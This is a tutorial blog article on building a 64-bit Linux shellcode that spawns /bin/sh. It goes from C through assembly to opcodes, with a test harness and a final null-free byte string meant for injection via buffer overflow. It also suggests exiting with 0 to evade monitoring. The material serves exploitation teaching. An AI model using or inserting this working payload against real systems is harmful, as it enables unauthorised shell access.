Making of a shellcode for a 64-bit Linux.
Spoiler: A quick return to basics with an article that takes us to the basics of software exploitation: making a shellcode on a 64-bit archi.
The other day, while teaching a class at INSA, I presented students with a method for making their own shellcode.
For those unfamiliar with the term, it is a string of characters containing binary code that can be executed on a machine. It must be different depending on the architecture on which it will run, but also on the OS for which it is intended.
My transparencies then showed as an example the creation of a shellcode on a Linux, for a 32-bit architecture. The binary executed was the most classic of shellcode: opening a command line.
And obviously, I was asked the following question: "What about 64bits?"
Here is a small article to answer the question, it details the
creation of a shellcode allowing to launch /bin/sh
if you have a Linux and a 64 bits processor.
 
Code C
If we were dead good, we could of course write the shellcode directly in machine code ... But few people speak opcode fluently ... Even assembly (a translation of opcodes a second more readable) is a language which is not very widespread ...
Tradition has it, therefore, that when we write a shellcode, we start with a code in C, which we will translate into assembler, then into machine code.
Writing code in C is optional, but has two advantages:
- it allows you to define a target, what is our code going to do exactly?
- it allows to have an executable that we can disassemble (translate
into assembly), for example, thanks to gdb, in order to see how it is done.
 
Target
The following program will launch a shell, through the use of
execve. It will serve as our target: it represents exactly
what we want our shellcode to do.
#include <stdio.h>
#include <unistd.h> 
#include <stdlib.h>
void main() {
    char *name[2];
    
    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);
    exit(0);
}When calling execve (), the system will replace the
current process with the one corresponding to the execution of
/bin/sh. If this operation is successful, the instruction
flow is interrupted to continue in this new process. If this fails,
execution will continue with the call exit(0).
In a main like ours, the call toexit(0)is
useless since ifexecve failed, the program would terminate
naturally anyway.
But the purpose of a shellcode is to be injected into the memory of
an attacked process to be executed (i.e. by buffer
overflow but not only). As we have no certainty either on the
success of execve(), or on the contents of memory after our
shellcode, we prefer to force a quiet termination of the process by a
call to exit() rather than to do so. let anything do it
anyhow.
If we wanted to be cleaner, we would have to do an
exit(1) but as we generally do not want to attract the
attention of monitoring by error return codes (with a 1), we lie to it
saying that everything is fine (with a 0).
The compilation
We compile with gcc, then we run the binary and we
observe that we have indeed opened a shell.
arsouyes@VBox:~/Documents$ gcc shellcode.c -o shellcode
arsouyes@VBox:~/Documents$ ./shellcode 
$ If you want to observe the disassembled code with gdb, I
advise you to compile with the following options:
- -staticcompiles in static mode, so as not to depend on external libraries, and at the same time, will allow to decompile the code of- execvesince it will be integrated into our binary,
- -ggdballows you to get more information in gdb, such as the name of functions,
- -fno-stack-protectorallows you to remove the protection against buffer overflow set by default at compile time by- gcc. On the one hand, because we don't care that our shellcode is protected against buffer overflow, on the other hand, because it increases the assembly code that we are going to obtain, and that we want to go to the essential.
Go through the assembly
Now that we know where we are going, we will write the assembly code corresponding to the C code.
We come up against two constraints:
- know the address of /bin/sh.
- get rid of external libraries.
The /bin/sh string
It is not possible to know in advance the address of the string
/bin/sh. We will therefore have to cunning to recover
it.
Interestingly, since we are on a 64-bit architecture, it is possible
to directly store the string /bin/sh, in its hexadecimal
form, in a register. /bin/sh in hexadecimal
gives:2f.62.69.6e.2f.73.68. As we are on a little-endian
architecture, this will give 0x68732f6e69622f. Finally,
since this is a character string, we will add the empty character
(0x00) at the end, so we will store the
string0x0068732f6e69622f in a register.
We can then pusher this register on the stack. The string address will then be the stack pointer address.
Execve
The second constraint is the obligation to free ourselves from any
external libraries, because we are not sure that they are present. We
will therefore have to go to the source of the calls, in our case to
execve andexit.
The execve function is quite a special function. It
requires asking the operating system to perform process control tasks.
As our user process is not capable of making these kinds of requests, we
have to make system
calls.
A little search in the system
call table of the Linux kernel tells us that execve
matches to system call number 59, i.e. 0x3b in
hexadecimal.
By convention
when calling a system call, on Linux, the parameters are passed via the
registers in the following order: rdi,rsi,
rdx,rcx, r8,r9.
Likewise, by convention,
the system call number must be in the rax registry. The
system call is then made via the assembly instruction
syscall. So we need to put the address of
/bin/sh in therdi register, the address of the
address of /bin/sh in thersi register, and 0
in the rdx register. We also need to have0x3b
in the rax registry.
Which translates into assembly by:
    mov    $0x3b, %rax
    mov    $0x0,  %rdx
    movabs $0x0068732f6e69622f,%r8      
    push   %r8
    mov    %rsp,  %rdi
    push   %rdx
    push   %rdi
    mov    %rsp,  %rsi
    syscall
    mov    $0x3c, %rax
    mov    $0x0,  %rdi
    syscall     Exit
As before, exit is a system call. It therefore works in the same way
as execve, i.e. its only parameter will be in
therdi register, and its number (60, i.e.
0x3c), must be in the register rax.
Its assembly code will therefore be:
    mov    $0x3c, %rax
    mov    $0x0,  %rdi
    syscall    If you want to use gdb to disassemble exit and observe its code, you will find that this is tedious;
exitcalls_run_exit_handlerswhich itself does a lot of things before calling_exit, which ends up doing the syscall by putting 0x3c in theraxregister.
Final code
Now that we have all the information to write our code, we can
concatenate it together and write the code in assembly language. To
facilitate, we add the few decorations that will allow us to have an
autonomous asm code:
.section .text
.globl _start
_start:
    mov    $0x3b, %rax
    mov    $0x0,  %rdx
    movabs $0x0068732f6e69622f,%r8                    
    push   %r8
    mov    %rsp,  %rdi
    push   %rdx
    push   %rdi
    mov    %rsp,  %rsi
    syscall
    mov    $0x3c, %rax
    mov    $0x0,  %rdi
    syscall     We convert to object code with as, then we generate an
executable file withld.
Since we are not using an external library, ld will just do some "decoration", that is, the header, the entry point, and not much more ...
arsouyes@VBox:~/Documents$ as -o asm.o asm.s
arsouyes@VBox:~/Documents$ ld -o asm asm.o
arsouyes@VBox:~/Documents$ ./asm
$ Opcode
Now that we have our assembly code, we can finally switch to machine
code. Each instruction must be translated into machine code, a sequence
of 0 and1 understandable by the processor. You
can use the INTEL
documentation for this.
 
But as a good computer scientist is a lazy computer scientist, we will use objdump, which will do it for us ...
objdump is a command line program for displaying various
information about object files. The option we are interested in is
-d, which allows disassembly. Each instruction is split
into a line, which begins with its address, then its hexadecimal
version, and finally, its assembly code.
arsouyes@VBox:~/Documents$ objdump -d asm.o
asm.o:     format de fichier elf64-x86-64
Déassemblage de la section .text :
0000000000000000 <_start>:
 0: 48 c7 c0 3b 00 00 00 mov    $0x3b,%rax
 7: 48 c7 c2 00 00 00 00 mov    $0x0,%rdx
 e: 49 b8 2f 62 69 6e 2f movabs $0x68732f6e69622f,%r8
15: 73 68 00 
18: 41 50                push   %r8
1a: 48 89 e7             mov    %rsp,%rdi
1d: 52                   push   %rdx
1e: 57                   push   %rdi
1f: 48 89 e6             mov    %rsp,%rsi
22: 0f 05                syscall 
24: 48 c7 c0 3c 00 00 00 mov    $0x3c,%rax
2b: 48 c7 c7 00 00 00 00 mov    $0x0,%rdi
32: 0f 05                syscall We will get the hexadecimal. This is our shellcode.
\x48\xc7\xc0\x3b\x00\x00\x00\x48
\xc7\xc2\x00\x00\x00\x00\x49\xb8
\x2f\x62\x69\x6e\x2f\x73\x68\x00
\x41\x50\x48\x89\xe7\x52\x57\x48
\x89\xe6\x0f\x05\x48\xc7\xc0\x3c
\x00\x00\x00\x48\xc7\xc7\x00\x00
\x00\x00\x0f\x05We can then test our shellcode. For that, we will use a small C code. By declaring a function pointer and giving it as value the address of the shellcode, we will be able to execute it:
#include<stdio.h>
#include<string.h>
int main(int argc, char **argv) {
    unsigned char code[] =
     "\x48\xc7\xc0\x3b\x00\x00\x00\x48"
     "\xc7\xc2\x00\x00\x00\x00\x49\xb8"
     "\x2f\x62\x69\x6e\x2f\x73\x68\x00"
     "\x41\x50\x48\x89\xe7\x52\x57\x48"
     "\x89\xe6\x0f\x05\x48\xc7\xc0\x3c"
     "\x00\x00\x00\x48\xc7\xc7\x00\x00"
     "\x00\x00\x0f\x05";
    
    int (*ret)() = (int(*)())code;
    ret();
}To compile, you must use the following options:
- -fno-stack-protectorto remove the stack protection automatically set by- gcc
- -z execstackin order to mark the program as allowing an executable stack.
arsouyes@VBox:~/Documents$ gcc testop.c -o testop -fno-stack-protector -z execstack
arsouyes@VBox:~/Documents$ ./testop 
$ exitYou may also need to install the execstack package.
And There you go ! Our shellcode works!
Remove 0x00
Our shellcode is still far from ready for real-world use.
The presence of 0x00 in it can cause it to be truncated
when copying with a function like strcpy ...
An alternative must therefore be found for each problematic instruction.
A mov instruction containing opcodes with 0's can be
replaced by apush, followed by a pop.
In our case :
mov    $0x3b,%rax et
mov   $0x3c,%rax are problematic and can
be replaced by
    push $0x3b
    pop %raxand
    push $0x3c
    pop %raxAn instruction putting 0x00 in a register can be replaced by an
xor of the register on itself.
We therefore perform a first replacement:
;   mov    $0x0,%rdx
    xor    %rdx,%rdxAnd a second:
;   mov    $0x0,%rdi
    xor    %rdi,%rdiFinally, our string itself ends with a \0. To avoid
this, we will use the string //bin/sh, which we will put in
the r8 register, then we will make an 8-bit shift, which will therefore
put a 0 at the end of the string .
In our case :
movabs $0x0068732f6e69622f,%r8 will be replaced by
;   movabs $0x0068732f6e69622f,%r8
    movabs $0x68732f6e69622f2f,%r8
    shr    $0x8,               %r8Our final assembly code will therefore be:
.section .text
.globl _start
_start:
    push $0x3b
    pop %eax
    xor %rdx,%rdx
    movabs $0x68732f6e69622f2f,%r8    
    shr $0x8, %r8                    
    push %r8
    mov %rsp, %rdi
    push %rdx
    push %rdi
    mov %rsp, %rsi
    syscall
    push $0x3c
    pop %eax
    xor %rdi,%rdi
    syscall     Using objdump, we check that there is no more 0
left:
arsouyes@VBox:~/Documents$ objdump -d asm2.o
asm2.o:     format de fichier elf64-x86-64
Déassemblage de la section .text :
0000000000000000 <_start>:
 0: 6a 3b                pushq  $0x3b
 2: 58                   pop    %rax
 3: 48 31 d2             xor    %rdx,%rdx
 6: 49 b8 2f 2f 62 69 6e movabs $0x68732f6e69622f2f,%r8
 d: 2f 73 68 
10: 49 c1 e8 08          shr    $0x8,%r8
14: 41 50                push   %r8
16: 48 89 e7             mov    %rsp,%rdi
19: 52                   push   %rdx
1a: 57                   push   %rdi
1b: 48 89 e6             mov    %rsp,%rsi
1e: 0f 05                syscall 
20: 6a 3c                pushq  $0x3c
22: 58                   pop    %rax
23: 48 31 ff             xor    %rdi,%rdi
26: 0f 05                syscallWe therefore have a shellcode from which we have removed the 0. We can test it in the same way as before, by inserting it in a C code.
#include<stdio.h>
#include<string.h>
int main(int argc, char **argv) {
    
    unsigned char code[] =
     "\x6a\x3b\x58\x48\x31\xd2\x49"
     "\xb8\x2f\x2f\x62\x69\x6e\x2f"
     "\x73\x68\x49\xc1\xe8\x08\x41"
     "\x50\x48\x89\xe7\x52\x57\x48"
     "\x89\xe6\x0f\x05\x6a\x3c\x58"
     "\x48\x31\xff\x0f\x05";
    
    int (*ret)() = (int(*)())code;
    ret();
}By compiling and running:
arsouyes@VBox:~/Documents$ gcc testop2.c -o testop2 -fno-stack-protector -z execstack
arsouyes@VBox:~/Documents$ ./testop2 
$ exitAnd after ?
You can use this method to create your own shellcodes. It can of course be adapted to a 32-bit Linux, or even to Windows. And reuse the principle to do more than just launch a shell ...